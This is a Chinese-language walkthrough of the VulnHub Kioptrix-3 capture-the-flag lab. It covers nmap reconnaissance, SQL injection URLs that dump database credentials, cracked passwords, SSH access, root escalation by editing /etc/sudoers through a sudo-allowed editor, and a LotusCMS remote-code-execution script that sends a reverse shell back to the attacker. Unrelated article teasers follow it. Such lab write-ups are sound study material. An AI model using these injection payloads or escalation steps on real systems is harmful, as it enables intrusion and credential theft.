Kioptrix-3

靶场下载地址

https://download.vulnhub.com/kioptrix/KVM3.rar

信息收集

# Nmap 7.94 scan initiated Thu Dec 21 21:52:25 2023 as: nmap -sn -oN live.nmap 192.168.1.0/24
Nmap scan report for 192.168.1.1 (192.168.1.1)
Host is up (0.00048s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 0bcc61d9e6ea39148e78c7c68571e53 (192.168.1.2)
Host is up (0.00040s latency).
MAC Address: 00:50:56:FE:B1:6F (VMware)
Nmap scan report for 192.168.1.72 (192.168.1.72)
Host is up (0.00054s latency).
MAC Address: 00:0C:29:25:61:5E (VMware)
Nmap scan report for 192.168.1.254 (192.168.1.254)
Host is up (0.00053s latency).
MAC Address: 00:50:56:FA:D3:D6 (VMware)
Nmap scan report for 192.168.1.60 (192.168.1.60)
Host is up.

靶机地址为192.168.1.72

# nmap -sT --min-rate 10000 -p- 192.168.1.72
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-21 21:52 CST
Nmap scan report for 192.168.1.72 (192.168.1.72)
Host is up (0.00090s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:25:61:5E (VMware)

端口开放情况:

22端口ssh 80端口http服务

# nmap -sT -sC -sV -O -p22,80 192.168.1.72 -oN details.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-21 21:52 CST
Nmap scan report for 192.168.1.72 (192.168.1.72)
Host is up (0.00084s latency).PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-title: Ligoat Security - Got Goat? Security ...
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
MAC Address: 00:0C:29:25:61:5E (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

22端口 openssh 4.7p1 80端口上开放的是http服务 server为apache 2.2.8 其中php版本为5.2.4 靶机为ubuntu运行在vmware中

# nmap -sT --script=vuln -p22,80 192.168.1.72 -oN vuln.nmap 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-21 21:53 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.1.72 (192.168.1.72)
Host is up (0.00071s latency).PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-trace: TRACE is enabled
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.1.72:80/index.php?page=index%27%20OR%20sqlspider
|     http://192.168.1.72:80/index.php?page=index%27%20OR%20sqlspider
|     http://192.168.1.72:80/index.php?page=index%27%20OR%20sqlspider
|     http://192.168.1.72:80/index.php?system=Admin&page=loginSubmit%27%20OR%20sqlspider
|     http://192.168.1.72:80/index.php?page=index%27%20OR%20sqlspider
|     http://192.168.1.72:80/index.php?page=index%27%20OR%20sqlspider
|     http://192.168.1.72:80/index.php?page=index%27%20OR%20sqlspider
|     http://192.168.1.72:80/index.php?page=index%27%20OR%20sqlspider
|     http://192.168.1.72:80/index.php?page=index%27%20OR%20sqlspider
|     http://192.168.1.72:80/index.php?system=Admin&page=loginSubmit%27%20OR%20sqlspider
|_    http://192.168.1.72:80/index.php?page=index%27%20OR%20sqlspider
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /phpmyadmin/: phpMyAdmin
|   /cache/: Potentially interesting folder
|   /core/: Potentially interesting folder
|   /icons/: Potentially interesting folder w/ directory listing
|   /modules/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch'
|_  /style/: Potentially interesting folder
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.72
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.1.72:80/index.php?system=Admin
|     Form id: contactform
|     Form action: index.php?system=Admin&page=loginSubmit
|     
|     Path: http://192.168.1.72:80/gallery/
|     Form id: 
|     Form action: login.php
|     
|     Path: http://192.168.1.72:80/index.php?system=Blog&post=1281005380
|     Form id: commentform
|     Form action: 
|     
|     Path: http://192.168.1.72:80/index.php?system=Admin&page=loginSubmit
|     Form id: contactform
|     Form action: index.php?system=Admin&page=loginSubmit
|     
|     Path: http://192.168.1.72:80/gallery/index.php
|     Form id: 
|     Form action: login.php
|     
|     Path: http://192.168.1.72:80/gallery/gadmin/
|     Form id: username
|_    Form action: index.php?task=signin
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: 00:0C:29:25:61:5E (VMware)

漏洞脚本探测出来的信息比较多,其中可能存在sql注入,存在多个目录 其中敏感的目录存在phpmyadmin

渗透阶段

先看一下80端口上的服务,肯定是从80端口进行突破了:

首先首页上的url,便可以尝试任意文件读取 sql注入的测试!

尝试任意文件读取漏洞,结果是不存在的!

有一个登陆界面,点击登陆界面的时候,发现http-title变成了LotusCMS,直接搜索公开的漏洞!

存在一个远程命令执行漏洞;一会可以测试一下,在这里看的时候,发现了下面这个界面:

然后就把后面的参数给删掉了 加上单引号,发现报错了:

存在sql注入了,尝试手工测试:

id为2的时候,是没有查询的结果的:

后面加上or语句 然后注释掉后面的sql语句,能查询出来结果!

判断列数: order by 6正常回显,那么就是一共是6列,接下来就是查询报错的回显点在什么位置:

回显点位于2 3这两个位置!接下来就是查询数据库 表名 以及里面的敏感数据!

http://kioptrix3.com/gallery/gallery.php?id=2%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27gallery%27),user(),4,5,6--+

http://kioptrix3.com/gallery/gallery.php?id=2%20union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27gallarific_users%27),user(),4,5,6--+

最终查询出来的账号和密码信息如下:

使用查询出来的账号和密码进行登录发现,一直登录不成功!于是又看了看其他的表,发现第一个是dev_accounts

然后看了下这个表中的各个列名,发现这个表中同样存在着username 和 password!

于是发现了两个账号和相关的密码信息:

利用在线md5平台进行解密:

dreg:Mast3r
loneferret: starwars

尝试利用这两个账号,进行登录web应用! 发现还是无法进行登录~ 再去尝试一下ssh

发现我们直接利用ssh登录成功;下面就是提权的阶段了。

提权

查看系统相关信息:

查看了/etc/passwd,发现存在两个用户,就是我们刚才查询出来的用户:

并且我们当前的用户 bash环境是受限制的,也就是rbash!先看看当前用户具有的suid权限:

没有权限,看看网站根目录下有什么信息吧:

受限制了~ 这里就需要去绕过rbash! 暂时先不去绕过,因为我们拿到了两个用户的账号和密码,通过/etc/passwd文件查看到了两个用户嘛 所以说我们可以尝试去利用ssh登录一下另外一个账号看一下:

同样我们也是可以进行登录的!

发现当前用户的家目录下面存在一个sh的脚本文件!还是想去看一下网站的目录下面存在什么东西,但是在/var/www/html下面什么都没有~

利用find命令去查找 我们直接通过目录扫描发现的相关文件,来定位到网站的目录:

最终在gallery目录下面的gconfig.php文件中发现,数据库的账号和密码信息:

登录到数据库中看了一下数据库里面的详细信息,没什么重要的发现;查看当前用户所具有的suid权限:

发现了两个命令是不需要root用户便可以执行的!其中!/usr/bin/su 是禁止当前用户直接使用su命令切换到root权限!但是下面还有一个命令,/usr/local/bin/ht 暂时不知道他的提权手法是什么,经过查询资料,发现ht是一个编辑器!Linux通过第三方应用提权实战总结 - FreeBuf网络安全行业门户

利用上述文章中提到的提权方法!进行尝试!sudo /usr/local/bin/ht

直接尝试运行,按F3打开文件 打开/etc/sudoers文件:

尝试在/etc/sudoers文件中添加一行命令:/bin/bash

然后按F2保存,再按Ctrl+c进行保存! 之后再次看到当前用户所拥有的sudo权限:

查看root目录下是否存在flag文件:

至此这个靶机也就完成了!

总结

这里回看了红队笔记的讲解,突破点跟本人的方法不太一样,这里进行补充:由于之前我们就发现了LotusCMS!

那么我们可以进行网上搜索公开的漏洞利用脚本等!

https://github.com/Hood3dRob1n/LotusCMS-Exploit/blob/master/lotusRCE.sh

脚本的利用手法为 目标ip 然后就是lotus的路径 ,其实就是根目录 /

./lotuscms.sh 192.168.1.72 /

然后就是提示我们使用什么IP 这里的ip肯定就是我们攻击机的IP地址!

填写端口号,这里攻击机使用7777端口进行监听!

选择 1 ;

执行id等命令,发现我们已经成功的接收到了shell!

之后便是来到了网站的目录下!寻找相关的配置文件!

发现了两个文件,一个事gadmin目录,另一个是配置文件(配置文件就不多说了,因为上面已经看过了)

尝试在web层面进行访问,这个gadmin应该就是后台管理员的登陆页面!

发现了一个后台的登陆地址!之前我们在mysql的数据库中发现了admin的账号和密码信息,便可以进行登录了!之前为什么登陆不进去,因为并不是登录的后台管理员地址!

成功登陆进来!虽然这与我们提权阶段没什么关系,但是当拿到新的信息的时候,需要去思考和权衡突破点的优先级。当然了在提权阶段红笔师父用的方法和本人的 方式是一样的!

(PS:但是这里我有一个疑问,之前在信息收集的时候,曾查看过/etc/sudoers文件的权限,没有写权限,为什么能用编辑器去修改呢?)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/295364.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

慎投!新增2本期刊剔除!中科院2区TOP仍被标记长达6个月!(内附1区TOP仅21天录用)

期刊动态:2本「On Hold」期刊被剔除 美国时间2023年12月19日,科睿唯安更新了WOS期刊目录(参考:警惕!5本剔除!中科院1区TOP,IF8.8,预警高风险期刊更名!)&…

运行游戏显示缺少d3dx9_42.dll怎么办,三步即可完美解决

在我们使用电脑玩游戏,工作的时候,偶尔会遇到一些错误提示,其中之一就是缺少d3dx9_42.dll。这个错误通常出现在运行某些游戏或应用程序时,它表示计算机缺少了DirectX 9组件中的d3dx9_42.dll文件。为了解决这个问题,下面…

Linux-Keepalived(VRRP协议)高可用集群搭建

Linux-Keepalived(VRRP协议)高可用集群搭建 一、VRRP简介1.1 什么是VRRP?1.2 keepalived是什么?1.3 keepalived工作原理 二、实操配置过程2.1 试验模型2.2. Keepalived监控和维护VRRP集群的步骤2.2.1 安装keepalived2.2.2 配置kee…

RocketMQ系统性学习-RocketMQ高级特性之消息存储在Broker的文件布局

🌈🌈🌈🌈🌈🌈🌈🌈 【11来了】文章导读地址:点击查看文章导读! 🍁🍁🍁🍁🍁🍁&#x1f3…

【go-zero】 go-zero API 如何接入 Nacos 被 java 服务调用 | go集成java服务

一、场景 外层使用的是springcloud alibaba 这一套java的分布式架构 然后需要接入go-zero的api服务 这里我们将对api服务接入Nacos进行一个说明 二、实战 1、package 因为使用的是go-zero框架 这里我们会优先使用go-zero生态的包 github 包如下: github.com/nacos-group/naco…

yarn : 无法将“yarn”项识别为 cmdlet、函数、脚本文件或可运行程序的名称。‘yarn‘ 不是内部或外部命令,也不是可运行的程序.解决方案

文章目录 报错截图介绍方法一方法二评论截图 报错截图 介绍 我的npm已经安装好了, 是可以运行npm -v 来查看版本的 这个时候报 yarn 不是内部或外部命令 相信你的npm也已经安装好了 我下面两个方法都进行了, 具体起作用的我也不知道是哪个, 都试试吧, 我成功了 注意尝试后关…

python区块链简单模拟【01】

完整代码 https://gitee.com/ihan1001 https://github.com/ihan1001 重点:时间戳,MD5哈希,SHA256哈希,base64一种用64个字符表示任意二进制数据的方法,ECC椭圆曲线算法 import time time.time()datetime.now().strfti…

WPF中使用ListView封装组合控件TreeView+DataGrid-粉丝专栏

wpf的功能非常强大,很多控件都是原生的,但是要使用TreeViewDataGrid的组合,就需要我们自己去封装实现。 我们需要的效果如图所示: 这2个图都是第三方控件自带的,并且都是收费使用。 现在我们就用原生的控件进行封装一…

使用Springboot做测试的步骤详解

​ 📢专注于分享软件测试干货内容,欢迎点赞 👍 收藏 ⭐留言 📝 如有错误敬请指正!📢交流讨论:欢迎加入我们一起学习!📢资源分享:耗时200小时精选的「软件测试…

CV算法面试题学习

本文记录了CV算法题的学习。 CV算法面试题学习 点在多边形内(point in polygon)高斯滤波器 点在多边形内(point in polygon) 参考自文章1,其提供的代码没有考虑一些特殊情况,所以做了改进。 做法&#xff…

Zookeeper-应用实战

Zookeeper Java客户端实战 ZooKeeper应用的开发主要通过Java客户端API去连接和操作ZooKeeper集群。 ZooKeeper官方的Java客户端API。 第三方的Java客户端API,比如Curator。 ZooKeeper官方的客户端API提供了基本的操作:创建会话、创建节点、读取节点、更新数据、…

【Unity基础】9.地形系统Terrain

【Unity基础】9.地形系统Terrain 大家好,我是Lampard~~ 欢迎来到Unity基础系列博客,所学知识来自B站阿发老师~感谢 (一)地形编辑器Terrain (1)创建地形 游戏场景中大多数的山川河流地表地貌都是基…